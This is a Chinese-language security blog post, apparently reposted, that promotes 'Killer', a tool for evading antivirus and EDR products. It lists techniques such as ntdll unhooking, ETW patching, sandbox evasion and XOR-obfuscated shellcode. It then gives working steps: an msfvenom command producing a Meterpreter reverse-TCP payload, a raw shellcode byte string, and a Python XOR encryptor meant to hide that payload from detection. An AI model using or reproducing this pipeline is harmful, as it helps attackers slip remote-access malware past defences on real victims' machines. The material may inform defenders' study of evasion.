【免杀系列】Killer AV/EDR 规避工具
2023-6-17 14:47:41 Author: Ots安全(查看原文) 阅读量:32 收藏

特征

  • 用于内存扫描规避的模块踩踏

  • 通过新的 ntdll 副本解除 DLL

  • IAT 隐藏和混淆 & API Unhooking

  • ETW Patchnig 用于绕过一些安全控制

  • 包括沙箱规避技术和基本反调试

  • 通过 XOR-ing 完全混淆(函数 - 键 - Shellcode)

  • Shellcode 逆向加密

  • 在不使用 API 的情况下将有效负载移动到神圣的内存中

  • GetProcAddress 和 GetModuleHandle 由 @cocomelonc 实现

  • 无需创建新线程即可运行 & 支持 x64 和 x86 arch

如何使用它

使用 msfvenom 工具生成你的 shellcode:

 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py

然后将输出复制到加密器 XOR 函数中:

data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
key  = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...
print('{ ', end='')for i in data: print(hex(i ^ key), end=', ')
print("0x0 };") # Notice that it adds one byte "0x0" to the end.

然后你就可以处理你的解密函数了,这对脚本小子来说并不容易^-^,你可以在我的文章中阅读更多相关信息:

  • 第 1 部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5

  • 第 2 部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354

  • 第 3 部分 => https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7

这是运行时的结果:

项目地址:

https://github.com/0xHossam/Killer

PoC(概念验证):

项目地址:

https://github.com/0xHossam/Killer

感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247498890&idx=1&sn=7e99e703624433d03ad0240ae8a77760&chksm=9badb5c1acda3cd72e402303c04742725ca12ac4e954ab64599cf49ba181d871e02532fad8fa#rd
如有侵权请联系:admin#unsafe.sh